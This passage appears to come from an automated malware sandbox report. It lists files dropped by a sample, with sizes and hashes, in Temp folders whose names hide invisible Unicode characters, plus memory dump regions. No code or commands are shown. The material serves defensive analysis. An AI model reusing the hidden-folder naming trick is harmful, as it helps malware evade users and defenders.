978d585fa6e2e957539ef26b9b1b546f04b5138a

SHA256
dab8b75010cfc657df1f13b1969d4d3b3de9365e171a8a2237d76fb39ab7b35d

SHA512
b66f44d0d0f04eb4b50266fb41514191199837b739d181eb4601f87534eeff2313fe662651cc028005b0362788c224b5c4ebf1418a577d9603c8177992b87041

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ ‍ \Common Files\Desktop\OpenConvertTo.txt

Filesize
1.1MB

MD5
9ba5436eb24dc273a501d6ea30c10f89

SHA1
b34d92401d936fc3be32f721093a176788e09819

SHA256
bf5783648f26c62688319c4204279caf561f14d3a39090e9f61fc8797ae7ae5b

SHA512
5d5a9b11b89330d79a7656fc15d162ebf0244394da4f79f6260d07cb13c07495665e95f93c94344d0dfc4d2078b630a0b951b2652750e0724ee37f288f74b79a

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ ‍ \Common Files\Desktop\OutSplit.mp4

Filesize
544KB

MD5
79019279098f80b7229bfead30b9df09

SHA1
eda5d03567b09cf3fc2172e70992d9ae28f50ed4

SHA256
23f9b79e51d52aa56adf66453ec6d74a721c2ad880cbbea31618866c6961a2c7

SHA512
df57e6709c38c06cc7b15f834b2467c8321be96535a0657f9b1e2aee4c472d036a74859aee0863ac12f60581945215344f138e4bff6cab6b1913a3e8d6e460b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ ‍ \Common Files\Desktop\SkipResume.xlsx

Filesize
9KB

MD5
6cb426ed6a37b3510b7ca772e49e31fd

SHA1
447e6dc69b6686f71713399d08c2697593e679a3

SHA256
affc76f9c7b5bb21dc310111e7bfc7a66e756288f2f515fecc72f9bb2ff04307

SHA512
4afe8db40311f01f51ac063d4b31eefe9f018e1d7d3cb86ca84beaa4b55361186be0a2906dc980fa64db1f452d13b33f2152b9b89c814b52a6b002a5f31488c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ ‍ \Common Files\Desktop\SyncExpand.xlsx

Filesize
10KB

MD5
0d0ed233f3bcac4ee1f7cdf3176695bd

SHA1
ba729bb91f826a553befd50e978eb057a4d80f00

SHA256
fdd9fe2453256bd252004d9ccabcebbb47e55c4c8696d0c13a74c43a3030cdb1

SHA512
16318e3bf66a011289329191e4d31fb329b5ec99e0b4a49909fff2374e42f2f1344d43b6086da41ee5d0c3bcc2572c93f1ea0fd47f3cb4afb51f0781a2501903

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ ‍ \Common Files\Documents\AddBackup.xlsx

Filesize
14KB

MD5
e385a991a7f462ab5a69c22c3484ecf1

SHA1
d32dd7e80026db52fd47134d8094c2acddb2dda9

SHA256
01aef927e279662523af78d645da4538c7557a62989d275b164af9dd3369722d

SHA512
c3a473c8e327a2ced526a473ef8c08857b8be40e961f7ab47a7449e0b816ca17635c6dc6b020782d6858b61cac96c7f5c09d830b9fa29c3f587debd81693c411

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ ‍ \Common Files\Documents\ConvertInitialize.pdf

Filesize
739KB

MD5
9e9f5551911bdbb46a0ec45968bcdef3

SHA1
5ee612b065becb61b499438de8befe93b618070a

SHA256
5d7c9482ecc8fe7335ccbde3a6dca5ffabb874c9d03e5d16a956c1b47bcdb375

SHA512
1499bf86c76deabe405c8a9215fdd884d8d881e4ac8116446b6806cad729853d7a1a1ed5e9db613c8b0afd451b0b0a452e9c819aa3da6d362e81400904728f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ ‍ \Common Files\Documents\JoinReset.xls

Filesize
346KB

MD5
066771601ef62c39d49f79a7fa2c0226

SHA1
716e0e365044b1bde0182197fa334bf3e46ce01f

SHA256
2bef2a3cd2840a18b74c88a9569ecfa3be23c0c22ce34a6d5bc4d37814966eab

SHA512
1f0008d6828e762c7dae40cfa59ba9929612bff4889d432c3f7758057ae996326c9c9ab8534818fc6e42731b98fc98fe40cd7bb6cfe90efe9c03071a1b090493

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ ‍ \Common Files\Documents\NewPublish.docx

Filesize
13KB

MD5
3181c9cc48b3d476879c546d861f6414

SHA1
476c40549ad86cbeb191884c41765b7b3b1eb823

SHA256
01908ce387b8b7c906964b463b23953cee1cf4e44a2099d8bcc6f41c852c2de9

SHA512
ea63946ce0601936708c3eb148e3539d9993a09077bfd731f8962c1a4f97655907dc1f1a5ebd2aa85a706601d68f9c886c24c3129bddf848d0d376643f5fd013

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ ‍ \Common Files\Documents\PopBackup.pdf

Filesize
624KB

MD5
5c512c222d7fe9f3f0e356628cc01393

SHA1
a77108bc476bf8f149a16c15d7bb67acfb279e3e

SHA256
3c0c9505954bea6d557354a468d4dbcfd720deb688e8915cc1d30e77568c7d1c

SHA512
9eba097096e0fdbb3a3de1ed2b1256eaf08f55edb0dc1fdfa09c142477ef70eb60652c0441418e75340e3c5c80fb26394eae08701edec52467472556c93122a9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zrua0swk\CSC980D2563EEFD4AA0857D86F8D84E92.TMP

Filesize
652B

MD5
57aa59e534e20a407d88aa6518dfd3dc

SHA1
7fac30b2691bf0f001c0791df445dc9c1aca7352

SHA256
a865aad9774115177e69d4587203b4171687eb39c8b2e98eecb48e7feca4842a

SHA512
55266b52964ef59f8cd25035dfdcdaf572e4645fd1e8ddc2da8e9ea94610e64ef676428a6cc35beab0123a5eedaf5a634831660c0869407c0696757f082e94c1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zrua0swk\zrua0swk.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zrua0swk\zrua0swk.cmdline

Filesize
607B

MD5
b0c6aabd3dab88340a5f5ce26d72404f

SHA1
3ca455822a57f0d20d80b277c3b5c9d90ab8c992

SHA256
f6ffc7e83ac6be028c7cb43895332088ae7575229f2093bf31c7de9ea2e29aa5

SHA512
bdc845857dafcf1b8ad20f7fd23618de27e74ef96e39daa964705e3e5dc5bb3e469f533fe252f81d3453af4292e97d5c63f3cf0613904805ef3a9cec0d2ce883

Download Submit
memory/1712-166-0x00000299CABA0000-0x00000299CABC2000-memory.dmp

Filesize
136KB

Download
memory/2984-30-0x00007FFA3F050000-0x00007FFA3F075000-memory.dmp

Filesize
148KB

Download
memory/2984-325-0x00007FFA2DE00000-0x00007FFA2DECD000-memory.dmp

Filesize
820KB

Download
memory/2984-378-0x00007FFA2E8E0000-0x00007FFA2E9FB000-memory.dmp

Filesize
1.1MB

Download
memory/2984-379-0x00007FFA2DED0000-0x00007FFA2E3F9000-memory.dmp

Filesize
5.2MB

Download
memory/2984-380-0x00007FFA3F050000-0x00007FFA3F075000-memory.dmp

Filesize
148KB

Download
memory/2984-223-0x00007FFA2EBC0000-0x00007FFA2ED3E000-memory.dmp

Filesize
1.5MB

Download
memory/2984-170-0x00007FFA39D70000-0x00007FFA39D94000-memory.dmp

Filesize
144KB

Download
memory/2984-81-0x00007FFA2E8E0000-0x00007FFA2E9FB000-memory.dmp

Filesize
1.1MB

Download
memory/2984-78-0x00007FFA43B80000-0x00007FFA43B8D000-memory.dmp

Filesize
52KB

Download
memory/2984-381-0x00007FFA475E0000-0x00007FFA475EF000-memory.dmp

Filesize
60KB

Download
memory/2984-50-0x00007FFA475E0000-0x00007FFA475EF000-memory.dmp

Filesize
60KB

Download
memory/2984-76-0x00007FFA2FF70000-0x00007FFA2FF84000-memory.dmp

Filesize
80KB

Download
memory/2984-26-0x00007FFA2ED40000-0x00007FFA2F405000-memory.dmp

Filesize
6.8MB

Download
memory/2984-69-0x00007FFA2ED40000-0x00007FFA2F405000-memory.dmp

Filesize
6.8MB

Download
memory/2984-71-0x00007FFA35720000-0x00007FFA35753000-memory.dmp

Filesize
204KB

Download
memory/2984-72-0x00007FFA2DED0000-0x00007FFA2E3F9000-memory.dmp

Filesize
5.2MB

Download
memory/2984-73-0x00007FFA3F050000-0x00007FFA3F075000-memory.dmp

Filesize
148KB

Download
memory/2984-74-0x00007FFA2DE00000-0x00007FFA2DECD000-memory.dmp

Filesize
820KB

Download
memory/2984-65-0x00007FFA3E500000-0x00007FFA3E519000-memory.dmp

Filesize
100KB

Download
memory/2984-66-0x00007FFA40B90000-0x00007FFA40B9D000-memory.dmp

Filesize
52KB

Download
memory/2984-62-0x00007FFA2EBC0000-0x00007FFA2ED3E000-memory.dmp

Filesize
1.5MB

Download
memory/2984-59-0x00007FFA3F1B0000-0x00007FFA3F1CA000-memory.dmp

Filesize
104KB

Download
memory/2984-60-0x00007FFA39D70000-0x00007FFA39D94000-memory.dmp

Filesize
144KB

Download
memory/2984-56-0x00007FFA3E1D0000-0x00007FFA3E1FD000-memory.dmp

Filesize
180KB

Download
memory/2984-322-0x00007FFA35720000-0x00007FFA35753000-memory.dmp

Filesize
204KB

Download
memory/2984-382-0x00007FFA2DE00000-0x00007FFA2DECD000-memory.dmp

Filesize
820KB

Download
memory/2984-324-0x00007FFA2DED0000-0x00007FFA2E3F9000-memory.dmp

Filesize
5.2MB

Download
memory/2984-383-0x00007FFA3F1B0000-0x00007FFA3F1CA000-memory.dmp

Filesize
104KB

Download
memory/2984-347-0x00007FF7B2F20000-0x00007FF7B2F52000-memory.dmp

Filesize
200KB

Download
memory/2984-348-0x00007FFA2ED40000-0x00007FFA2F405000-memory.dmp

Filesize
6.8MB

Download
memory/2984-354-0x00007FFA2EBC0000-0x00007FFA2ED3E000-memory.dmp

Filesize
1.5MB

Download
memory/2984-362-0x00007FFA2E8E0000-0x00007FFA2E9FB000-memory.dmp

Filesize
1.1MB

Download
memory/2984-349-0x00007FFA3F050000-0x00007FFA3F075000-memory.dmp

Filesize
148KB

Download
memory/2984-363-0x00007FF7B2F20000-0x00007FF7B2F52000-memory.dmp

Filesize
200KB

Download
memory/2984-377-0x00007FFA43B80000-0x00007FFA43B8D000-memory.dmp

Filesize
52KB

Download
memory/2984-376-0x00007FFA2FF70000-0x00007FFA2FF84000-memory.dmp

Filesize
80KB

Download
memory/2984-367-0x00007FFA3E1D0000-0x00007FFA3E1FD000-memory.dmp

Filesize
180KB

Download
memory/2984-364-0x00007FFA2ED40000-0x00007FFA2F405000-memory.dmp

Filesize
6.8MB

Download
memory/2984-388-0x00007FFA35720000-0x00007FFA35753000-memory.dmp

Filesize
204KB

Download
memory/2984-387-0x00007FFA40B90000-0x00007FFA40B9D000-memory.dmp

Filesize
52KB

Download
memory/2984-386-0x00007FFA3E500000-0x00007FFA3E519000-memory.dmp

Filesize
100KB

Download
memory/2984-385-0x00007FFA2EBC0000-0x00007FFA2ED3E000-memory.dmp

Filesize
1.5MB

Download
memory/2984-384-0x00007FFA39D70000-0x00007FFA39D94000-memory.dmp

Filesize
144KB

Download
memory/3464-346-0x00007FF7B2F20000-0x00007FF7B2F52000-memory.dmp

Filesize
200KB

Download
memory/3464-389-0x00007FF7B2F20000-0x00007FF7B2F52000-memory.dmp

Filesize
200KB

Download
memory/4000-229-0x0000023BDBA20000-0x0000023BDBA28000-memory.dmp

Filesize
32KB

Download
memory/4276-210-0x0000000005080000-0x000000000508A000-memory.dmp

Filesize
40KB

Download
memory/4276-171-0x0000000000780000-0x00000000007B2000-memory.dmp

Filesize
200KB

Download
memory/4276-181-0x0000000005690000-0x0000000005C34000-memory.dmp

Filesize
5.6MB

Download
memory/4276-191-0x00000000050E0000-0x0000000005172000-memory.dmp

Filesize
584KB

Download